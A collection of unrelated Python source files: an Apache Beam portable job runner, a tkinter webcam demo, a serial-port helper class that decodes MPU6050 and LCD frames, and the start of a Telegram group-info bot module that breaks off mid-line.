from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability import portable_stager
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None
@staticmethod
def _create_environment(options):
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(environment_type,
environment_type)
try:
environment_urn = getattr(common_urns.environments,
environment_type).urn
except AttributeError:
raise ValueError(
'Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, portable_options):
# TODO Provide a way to specify a container Docker URL
# https://issues.apache.org/jira/browse/BEAM-6328
if not self._dockerized_job_server:
self._dockerized_job_server = job_server.StopOnExitJobServer(
job_server.DockerizedJobServer())
return self._dockerized_job_server
def create_job_service(self, options):
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer()
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return server.start()
def run_pipeline(self, pipeline, options):
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment(
'use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=sdk_worker_main._get_state_cache_size(options),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# Some runners won't detect the GroupByKey transform unless it has no
# subtransforms. Remove all sub-transforms until BEAM-4605 is resolved.
for _, transform_proto in list(
proto_pipeline.components.transforms.items()):
if transform_proto.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
for sub_transform in transform_proto.subtransforms:
del proto_pipeline.components.transforms[sub_transform]
del transform_proto.subtransforms[:]
# Preemptively apply combiner lifting, until all runners support it.
# These optimizations commute and are idempotent.
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'lift_combiners').lower()
if not options.view_as(StandardOptions).streaming:
flink_known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn])
if pre_optimize == 'none':
pass
elif pre_optimize == 'all':
proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
proto_pipeline,
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.annotate_stateful_dofns_as_roots,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.fix_flatten_coders,
# fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.extract_impulse_stages,
fn_api_runner_transforms.remove_data_plane_ops,
fn_api_runner_transforms.sort_stages],
known_runner_urns=flink_known_urns)
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in 'lift_combiners':
phases.append(getattr(fn_api_runner_transforms, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s'
% phase_name)
proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=flink_known_urns,
partial=True)
job_service = self.create_job_service(options)
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=portable_options.job_server_timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc._channel._Rendezvous as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action' : 'store', 'help' : option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true'\
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = options.get_all_options(add_extra_args_fn=add_runner_options)
# TODO: Define URNs for options.
# convert int values: https://issues.apache.org/jira/browse/BEAM-5509
p_options = {'beam:option:' + k + ':v1': (str(v) if type(v) == int else v)
for k, v in all_options.items()
if v is not None}
prepare_request = beam_job_api_pb2.PrepareJobRequest(
job_name='job', pipeline=proto_pipeline,
pipeline_options=job_utils.dict_to_struct(p_options))
_LOGGER.debug('PrepareJobRequest: %s', prepare_request)
prepare_response = job_service.Prepare(
prepare_request,
timeout=portable_options.job_server_timeout)
artifact_endpoint = (portable_options.artifact_endpoint
if portable_options.artifact_endpoint
else prepare_response.artifact_staging_endpoint.url)
if artifact_endpoint:
stager = portable_stager.PortableStager(
grpc.insecure_channel(artifact_endpoint),
prepare_response.staging_session_token)
retrieval_token, _ = stager.stage_job_resources(
options,
staging_location='')
else:
retrieval_token = None
try:
state_stream = job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(
job_id=prepare_response.preparation_id),
timeout=portable_options.job_server_timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain(
[next(state_stream)],
state_stream)
message_stream = job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(
job_id=prepare_response.preparation_id),
timeout=portable_options.job_server_timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = job_service.Run(
beam_job_api_pb2.RunJobRequest(
preparation_id=prepare_response.preparation_id,
retrieval_token=retrieval_token))
if state_stream is None:
state_stream = job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(
job_id=run_response.job_id))
message_stream = job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(
job_id=run_response.job_id))
result = PipelineResult(job_service, run_response.job_id, message_stream,
state_stream, cleanup_callbacks)
if cleanup_callbacks:
# We wait here to ensure that we run the cleanup callbacks.
logging.info('Waiting until the pipeline has finished because the '
'environment "%s" has started a component necessary for the '
'execution.', portable_options.environment_type)
result.wait_until_finish()
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys
if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
class PipelineResult(runner.PipelineResult):
def __init__(self, job_service, job_id, message_stream, state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
def cancel(self):
try:
self._job_service.Cancel(beam_job_api_pb2.CancelJobRequest(
job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# Filter only messages with the "message_response" and error messages.
messages = [m.message_response for m in self._messages
if m.HasField('message_response')]
error_messages = [m for m in messages
if m.importance ==
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self):
def read_messages():
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(
message.state_response.state))
self._messages.append(message)
t = threading.Thread(target=read_messages, name='wait_until_finish_read')
t.daemon = True
t.start()
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
t.join(10)
break
if self._state != runner.PipelineState.DONE:
raise RuntimeError(
'Pipeline %s failed in state %s: %s' % (
self._job_id, self._state, self._last_error_message()))
return self._state
finally:
self._cleanup()
def _cleanup(self):
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
|
camera_demo.py
|
import time
import threading
import tkinter as tk
from PIL import Image
from PIL import ImageTk
import cv2
# Prepare the window
window = tk.Tk()
window.title('Camera Demo')
window.geometry('640x480')
# Creates a thread for openCV processing
def start_as_background_task(loop_function):
run_event = threading.Event()
run_event.set()
action = threading.Thread(target=loop_function, args=(run_event,))
action.setDaemon(True)
action.start()
return run_event
# This is the infinite loop where we display the camera feed
def cvloop(run_event):
global main_panel
camera = cv2.VideoCapture(0)
# Run while the app hasn't been terminated
while run_event.is_set():
# Read an image from the camera feed
_, image = camera.read()
# Convert it from BGR to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# Prepare it for displaying on tkinter
image = Image.fromarray(image)
image = ImageTk.PhotoImage(image)
display.configure(image=image)
display.image = image
camera.release()
# Main widget for holding the camera feed
display = tk.Label(window)
display.pack(padx=10, pady=10)
# This is needed for the GUI to display the camera feed properly
run_event = start_as_background_task(cvloop)
# Clean everything up when the user wants to quit
def terminate():
global window, run_event
run_event.clear()
time.sleep(.5)
window.destroy()
print("Bye!")
# When the GUI is closed it calls the terminate() function
window.protocol("WM_DELETE_WINDOW", terminate)
# Show the GUI
window.mainloop()
|
mySerial.py
|
import numpy as np
import serial # 导入模块
import serial.tools.list_ports
import threading
import time
# 返回 成功读入的字节数
def checkPorts():
return [sp.device for sp in serial.tools.list_ports.comports()]
class Port:
def __init__(self, portname='com9', bps=115200, maxtime=1, bytesize=8, parity='none', stopbits=1):
# 波特率,标准值之一:
# 超时设置,None:永远等待操作,0为立即返回请求结果,其他值为等待超时时间(单位为秒)
# 打开串口,并得到串口对象
self.ser = serial.Serial(portname, bps, timeout=maxtime,
bytesize={5: serial.FIVEBITS, 6: serial.SIXBITS, 7: serial.SEVENBITS,
8: serial.EIGHTBITS}[bytesize], parity=
{'none': serial.PARITY_NONE, 'even': serial.PARITY_EVEN, 'odd': serial.PARITY_ODD,
'mark': serial.PARITY_MARK, 'space': serial.PARITY_SPACE}[parity], stopbits=
{1: serial.STOPBITS_ONE, 1.5: serial.STOPBITS_ONE_POINT_FIVE, 2: serial.STOPBITS_TWO}[
stopbits])
self.encoding = 'gbk'
self.decoding = 'gbk'
if (self.ser.is_open):
# 读取数据
# 详细参数
print(self.ser)
print("your serial port had been opened whose info will be showed next ..")
print("your device named", self.ser.name) # 设备名字
print("port type is", self.ser.port) # 读或者写端口
print('your baud is', self.ser.baudrate)
print("bytesize is", self.ser.bytesize) # 字节大小
print("parity is", self.ser.parity) # 校验位
print("stopbits is", self.ser.stopbits) # 停止位
print("timeout is", self.ser.timeout) # 读超时设置
print("writeTimeout is", self.ser.writeTimeout) # 写超时
print("xonxoff is", self.ser.xonxoff) # 软件流控
print("rtscts is ", self.ser.rtscts) # 软件流控
print("dsrdtr is", self.ser.dsrdtr) # 硬件流控
print("interCharTimeout", self.ser.interCharTimeout) # 字符间隔超时
print('your serial port is', self.ser.port)
else:
raise Exception("serial port error!")
# 读取字节数和方式 默认utf8解码
def getInfo(self):
return f"""your serial port had been opened whose info will be showed next .." \n
"your device named", {self.ser.name} \n
"port type is", {self.ser.port}\n
'your baud is', {self.ser.baudrate}\n
"bytesize is", {self.ser.bytesize}\n
"parity is", {self.ser.parity}\n
"stopbits is", {self.ser.stopbits}\n
"timeout is", {self.ser.timeout}\n
"writeTimeout is", {self.ser.writeTimeout}\n
"xonxoff is", {self.ser.xonxoff}\n
"rtscts is ", {self.ser.rtscts}\n
"interCharTimeout", {self.ser.interCharTimeout}\n
'your serial port is', {self.ser.port}"""
def help(self):
# 打印能使用的方法
# print(ser.read())#读一个字节
# print(ser.read(10).decode("utf8"))#读十个字节
# print(ser.readline().decode("utf8"))#读一行
# print(ser.readlines())#读取多行,返回列表,必须匹配超时(timeout)使用
# print(ser.in_waiting)#获取输入缓冲区的剩余字节数
# print(ser.out_waiting)#获取输出缓冲区的字节数
print(__doc__)
print("""
ser=serial.Serial("/dev/ttyUSB0",9600,timeout=0.5) #使用USB连接串行口
ser=serial.Serial("/dev/ttyAMA0",9600,timeout=0.5) #使用树莓派的GPIO口连接串行口
ser=serial.Serial(1,9600,timeout=0.5)#winsows系统使用com1口连接串行口
ser=serial.Serial("com1",9600,timeout=0.5)#winsows系统使用com1口连接串行口
ser=serial.Serial("/dev/ttyS1",9600,timeout=0.5)#Linux系统使用com1口连接串行口
""")
print("Port对象属性")
print("""
name:设备名字
port:读或者写端口
baudrate:波特率
bytesize:字节大小
parity:校验位
stopbits:停止位
timeout:读超时设置
writeTimeout:写超时
xonxoff:软件流控
rtscts:硬件流控
dsrdtr:硬件流控
interCharTimeout:字符间隔超时
""")
print("常用方法")
print("""
ser.isOpen():查看端口是否被打开。
ser.open() :打开端口‘。
ser.close():关闭端口。
ser.read():从端口读字节数据。默认1个字节。
ser.read_all():从端口接收全部数据。
ser.write("hello"):向端口写数据。
ser.readline():读一行数据。
ser.readlines():读多行数据。
in_waiting():返回接收缓存中的字节数。
flush():等待所有数据写出。
flushInput():丢弃接收缓存中的所有数据。
flushOutput():终止当前写操作,并丢弃发送缓存中的数据。
""")
print("本类的方法")
print(self.__dict__)
def decodeMPU6050(self, frames):
# //传送数据给匿名四轴上位机软件(V2.6版本)
# //fun:功能字. 0XA0~0XAF
# //data:数据缓存区,最多28字节!!
# //len:data区有效数据个数
# void usart1_niming_report(u8 fun,u8*data,u8 len)
# {
# u8 send_buf[32];
# u8 i;
# if(len>28)return; //最多28字节数据
# send_buf[len+3]=0; //校验数置零
# send_buf[0]=0X88; //帧头
# send_buf[1]=fun; //功能字
# send_buf[2]=len; //数据长度
# for(i=0;i<len;i++)send_buf[3+i]=data[i]; //复制数据
# for(i=0;i<len+3;i++)send_buf[len+3]+=send_buf[i]; //计算校验和
# for(i=0;i<len+4;i++)usart1_send_char(send_buf[i]); //发送数据到串口1
# }
# void usart1_report_imu(short aacx,short aacy,short aacz,short gyrox,short gyroy,short gyroz,short roll,short pitch,short yaw)
# {
# u8 tbuf[28];
# u8 i;
# for(i=0;i<28;i++)tbuf[i]=0;//清0
# tbuf[0]=(aacx>>8)&0XFF;
# tbuf[1]=aacx&0XFF;
# tbuf[2]=(aacy>>8)&0XFF;
# tbuf[3]=aacy&0XFF;
# tbuf[4]=(aacz>>8)&0XFF;
# tbuf[5]=aacz&0XFF;
# tbuf[6]=(gyrox>>8)&0XFF;
# tbuf[7]=gyrox&0XFF;
# tbuf[8]=(gyroy>>8)&0XFF;
# tbuf[9]=gyroy&0XFF;
# tbuf[10]=(gyroz>>8)&0XFF;
# tbuf[11]=gyroz&0XFF;
# tbuf[18]=(roll>>8)&0XFF;
# tbuf[19]=roll&0XFF;
# tbuf[20]=(pitch>>8)&0XFF;
# tbuf[21]=pitch&0XFF;
# tbuf[22]=(yaw>>8)&0XFF;
# tbuf[23]=yaw&0XFF;
# usart1_niming_report(0XAF,tbuf,28);//飞控显示帧,0XAF
# }
# 将传来的16进制数组数据解码
# 0~2 是帧头,功能字,数据长度
# 31是校验和
# 3到30是数据,刚好0~27 28个数据, 现在只有24个数据被使用,剩余的是0
#frame是32的倍数
#如果不是88则丢弃
if frames!=[]:
if not issubclass(type(frames),Exception):
try:
find=frames.index('88')
except Exception as e:
return Exception(str(e)+"..没有检测到MCU数据帧头88,建议查看一下数据帧是不是正确的")
frames=frames[find:]
if (len(frames)<32):
return Exception("数据帧格式错误,必须为32整数")
frameLeng=32
framesNum=int(len(frames)/frameLeng)
frameList=[[bin(int('0x'+j,16)) for j in frames[i*32:i*32+32]] for i in range(framesNum)]
flag= bin(int('0xaf',16))
rpy = [0, 0, 0]
for frame in frameList:
if (frame[1] ==flag): # 对应usart1_report_imu
#计算检验位
checksum = int(frame[31],2)
data=sum([int(i,2) for i in frame[:31]])
if data% 256 == checksum:
index=0
for i in range(21, 27, 2):
sign=1
low=frame[i+1][2:]
high=frame[i][2:]
while(len(low)<8):
low='0'+low
# print(f"如今的high={high} low={low} ")
if(high[0]=='1' and len(high)==8):
hlist=list(high)
llist=list(low)
sign=-1
for h in range(len(high)):
if(high[h]=='1'):
hlist[h]='0'
else:
hlist[h]='1'
for l in range(len(low)):
if(llist[l]=='1'):
llist[l]='0'
else:
llist[l]='1'
high=''.join(hlist)
low=''.join(llist)
rpy[index]+=int(high+low,2)*sign
index+=1
data=list(np.divide(rpy[:2],[framesNum*100]))
data.append(rpy[2]/(10*framesNum))
return data
else:
return Exception("frames 犯病了,原因是"+str(frames))
else:
return Exception("MPU frames为空")
# 检验和
# checksum = frame[31]
# # 检验
# if sum(data)%256==checksum:
# # 高位aacx
# aacx=frame[3]*16+frame[4]
# aacy=frame[5]*16+frame[6]
# aacz=frame[7]*16+frame[8]
# gyrox=frame[9]*16+frame[10]
# gyroy= frame[11] * 16 + frame[12]
# gyroz = frame[13] * 16 + frame[14]
# # +7
#
# print([aacx,aacy,aacz,gyrox,gyroy,gyroz,roll,pitch,yaw])
# print(frame[23],frame[24])
# print(roll,pitch,yaw)
# # mpudata.append([aacx,aacy,aacz,gyrox,gyroy,gyroz,roll,pitch,yaw])
@staticmethod
def decodeLcd():
def decode_RLE(inbuf,inSize):
src=inbuf;
srcIndex=0
with open('decoded.txt','w+')as f :
while(srcIndex<inSize):
sign=src[srcIndex]
srcIndex+=1
count=abs(sign)-0x80 if sign<0 else sign
# print(count,sign)
if(sign<0):
# print('重复的有',count,src[srcIndex])
for i in range(count):
f.write(hex(abs(src[srcIndex]))[2:])
srcIndex+=1
else:
# print('不重复的有', count)
for i in range(count):
# print(src[srcIndex])
h=hex(abs(src[srcIndex]))[2:]
if len(h)==1:
h='0'+h
if sign==4 and h in ['01','02'] :
pass
elif sign==2 and h in ['05','06','03','04'] :
pass
else:
f.write(h)
srcIndex+=1;
with open('lcd.txt') as f:
frames=f.read()
# print(frames)
print(frames)
decodeFrames=[]
for i in range(0, len(frames), 2):
#是负的,代表要continue
a=int(frames[i:i+2],16)
if a>0x80:
decodeFrames.append(-a)
else:
decodeFrames.append(a)
decodeFrames.append(0)
print(len(decodeFrames))
#7042
decode_RLE(decodeFrames,len(decodeFrames))
def readLCD(self):
self.wholeData=''
self.byteCount=0
self.timecount=0
self.lcdFrames=""
while self.ser.in_waiting == 0:
pass
print('开始录入数据')
with open('lcd.txt','w+') as f:
start = self.ser.read(self.ser.in_waiting).hex()
time1=time.time()
self.lcdFrames+=start
self.byteCount += len(self.lcdFrames)
f.write(self.lcdFrames)
count=0
waiting1=0
waiting2=0
try:
while 1:
if self.ser.in_waiting > 0:
# print(self.ser.in_waiting)
if self.ser.in_waiting==22446:
time2=time.time()
print('已传输完毕,用时{}'.format(time2 - time1))
break
# self.wholeData =self.ser.read(self.ser.in_waiting).hex()
# # print(self.wholeData)
# self.byteCount += len(self.wholeData)
# f.write(self.wholeData)
# if self.wholeData.rfind('0304')!=-1:
# time2 = time.time()
# print('已传输完毕,用时{}s,总数据量为{},速度为{}kb/s'.format(time2-time1,self.byteCount,self.byteCount/(time2-time1)/1024))
# self.ser.close()
# break
else:
self.wholeData = ""
except Exception as e:
print(e)
def readline(self, options="text"):
if(self.ser.is_open):
if options == "hex":
s=self.ser.readline().hex()
return [s[i:i+2] for i in range(0,len(s),2)]
elif options == "text":
try:
return self.ser.readline().decode(self.decoding)
except Exception as e:
return e
elif options == "all":
pass
else:
raise Exception("please input right format like hex or text but no",options)
else:
return Exception("串口已关闭,你在读nm呢")
def readData(self, num: int, options="text") -> str:
# 选择16进制或者 10进制
if(self.ser.is_open):
if options == "hex":
s=self.ser.read(num).hex()
if s!=[]:
return [s[i:i+2] for i in range(0,len(s),2)]
else:
return Exception("艹,这是一个空帧")
elif options == "text":
try:
t=self.ser.read(num).decode(self.decoding)
if t!='':
return t
else:
return Exception("空空空数据")
except Exception as e:
return Exception("text出现了什么问题呢?"+str(e))
elif options == "all":
pass
else:
raise Exception("please input right format like hex or text but no",options)
else:
return Exception("串口已关闭,你在读nm呢")
def getWholeData(self, options='text'):
if(self.ser.is_open):
"""很重要!!!"""
time.sleep(0.05)
try:
if self.ser.in_waiting>0:
self.wholeData = self.readData(self.ser.in_waiting, options=options)
print(se)
#等待开始
else:
self.wholeData = []
except Exception as e:
return e
return self.wholeData
else:
return Exception("串口已关闭,你在读nm呢")
def hangThread2ReadData(self,options):
print("-------- start hanging to read data -------- ")
while(self.hang):
self.getWholeData(options)
def writeData(self, string: str) -> int:
# 返回成功传入的字数
num = self.ser.write(string.encode(self.encoding))
#priont("writed {} bytes!".format(num))
return num
# 默认开启线程
def readDataByThtead(self, options='text', thread=True):
self.wholeData = ''
self.hang=1
# 循环接收数据,此为死循环,可用线程实现
if (thread):
th = threading.Thread(target=self.hangThread2ReadData, name='getWholedata', args=([options]))
th.start()
else:
self.getWholeData(options)
|
unparse.py
|
from ast import parse
from os import link
from mysql.connector import connection
from telegram.parsemode import ParseMode
import modules.core.extract as extract
import time
import threading
import itertools
from multiprocessing.pool import ThreadPool
import modules.core.database as database
from modules.core.warn import warn
import json
from config import *
chat_lock = []
chat_lock_bool = 0
class unparse_cls():
next_id = 0
def __init__(self, update, context) -> None:
#threading.Thread.__init__(self)
#threading.Thread.start(self)
#print(threading.Thread.getName,threading.current_thread().ident)
#print(object(),self.id,threading.Thread.getName,threading.current_thread().ident)
#time.sleep(3)
self.update = update
self.context = context
self.msg = None
self.user = None
self.tag_msg = None
self.tag_user = None
self.msg = update.message
self.user = user = self.msg['from_user']
self.chat = chat = self.msg['chat']
self.db = database.bot_db()
try:
self.tag_msg = tag_msg = update.message.reply_to_message
self.tag_user = tag_user = tag_msg['from_user']
self.tag_user_id = tag_user["id"]
self.db.add_user(user=tag_user)
except:
pass
self.db.parse(chat=chat, user=user)
self.user_id = self.user["id"]
self.chat_id = self.chat["id"]
self.msg_string = self.msg.text
#self.lock_del
#del self
#del(self)
def admin_sync(self, stri=0):
chat = self.update.effective_chat
administrators = chat.get_administrators()
text = ""
for admin in administrators:
status = admin.status
user = admin.user
status = admin.status
self.db.add_user(user)
self.db.add_link(chat,user,status,1)
if stri == 1:
if status == "creator":
text = "(Owner) " + user["first_name"] + text
else:
text = text + "\n" + "(Admin) " + user["first_name"]
return text
def sync(self, rep = 0):
ms = None
if rep == 1:
ms = self.msg.reply_text("Syncing...", parse_mode="HTML",disable_web_page_preview=True)
try:
self.db.add_chat(self.chat)
except: pass
self.admin_sync()
for x,y in enumerate(self.db.get_link(self.chat_id,comp=1)):
detail = self.context.bot.get_chat_member(
self.chat_id, y[2] )
self.db.add_link(self.chat,detail.user,detail["status"],replace=3)
database.create_db()
if rep == 1:
ms.edit_text("Synced !", parse_mode="HTML",disable_web_page_preview=True)
def group_info(self):
text = self.admin_sync(stri=1)
count = self.chat.get_member_count()
try:
username = self.chat["username"]
uname = "\nUsername : @" + username
except:
uname = ""
try:
link_name = self.context.bot.exportChatInviteLink(self.chat_id)
except:
try:
link_name = "telegram.me/" + username
except:
link_name = "Unable to fetch the links ! "
#link_name = "<a href='" + invitelink + "'>telegram.me/joinchat/</a>"
text = "Group Info -\n\n" + \
"ID : " + str(self.chat_id) + \
"\nName : " + self.chat["title"] + uname + \
"\nMembers : " + str(count) + \
"\n\nAdministrators :\n" + text + \
"\n\nGroup link : " + link_name
#text = self.db.get_link(self.chat_id)
self.msg.reply_text(text, parse_mode="HTML",disable_web_page_preview=True)
def user_info(self):
li = self.db.get_link(self.chat_id,self.tag_user_id)
status = "\nStatus : " + li[3]
bot = ""
if self.tag_user['is_bot'] == True:
bot = "\nBot : True"
spot = "\nSpotted on : " + str(li[5])
warns = self.db.get_warn(self.chat_id,self.tag_user_id)[0][7]
if warns != 0:
warns = "\nWarn Strike/s : " + str(warns)
else:
warns = ""
try:
username = self.tag_user["username"]
uname = "\nUsername : @" + self.tag_user["username"]
except:
uname = ""
try:
ulink = "\nUser link : " + "<a href='https://telegram.me/" + \
username + "'>" + "https://telegram.me/" + username + "</a>"
except:
ulink = ""
try:
plink = "\nPermanent link : " + "<a href='tg://user?id=" + \
str(self.tag_user_id) + "'>Click Here</a>"
pass
except:
pass
try:
lname = " " + self.tag_user["last_name"]
except:
lname = ""
text = "User Info - \n\n" + \
"Id : " + str(self.tag_user_id) +\
"\nName : " + self.tag_user["first_name"] + lname +\
uname + ulink + \
"\n\nIn-Group Details :\n" + bot + status + spot + warns + plink
self.msg.reply_text(text, parse_mode="HTML",disable_web_page_preview=True)
def msg_info(self):
msg_id = self.tag_msg.message_id
msgid = "\n\nMessage id : " + str(msg_id)
userid = " (" + str(self.tag_user_id) + ")"
try:
first_name = self.tag_user.first_name
if first_name == None:
first_name = ""
except:
first_name = ""
try:
last_name = self.tag_user.last_name
if last_name == None:
last_name = ""
except:
last_name = ""
try:
user_name = self.tag_user.username
if user_name == None:
name = "\nName : <a href='tg://user?id=" + \
str(self.tag_user_id) + "'>" + str(first_name) + \
" " + str(last_name) + "</a>" + str(self.tag_user_id)
else:
name = "\nName : <a href='telegram.me/" + \
str(user_name)+"'>" + str(first_name) + \
" " + str(last_name) + "</a>" + userid
except:
user_name = "<a href='tg://user?id=" + \
str(self.tag_user_id) + "'>" + str(first_name) + "</a>"
name = "\nName : <a href='tg://user?id=" + \
str(self.tag_user_id) + "'>" + str(first_name) + \
" " + str(last_name) + "</a>" + userid
try:
grpusr = self.chat["username"]
except: pass
try:
date = "\nDate : " + str(self.tag_msg.date)
except:
date = ""
try:
edt = self.tag_msg.edit_date
if edt != None:
edit_date = "\nEdited : " + str(edt)
else:
edit_date = ""
except:
edit_date = ""
try:
link = "\nMessage link : <a href='" + self.tag_msg.link + "'>Link</a>"
except:
link = ""
try:
chat_name = "\nChat : " + " <a href='t.me/" + grpusr + \
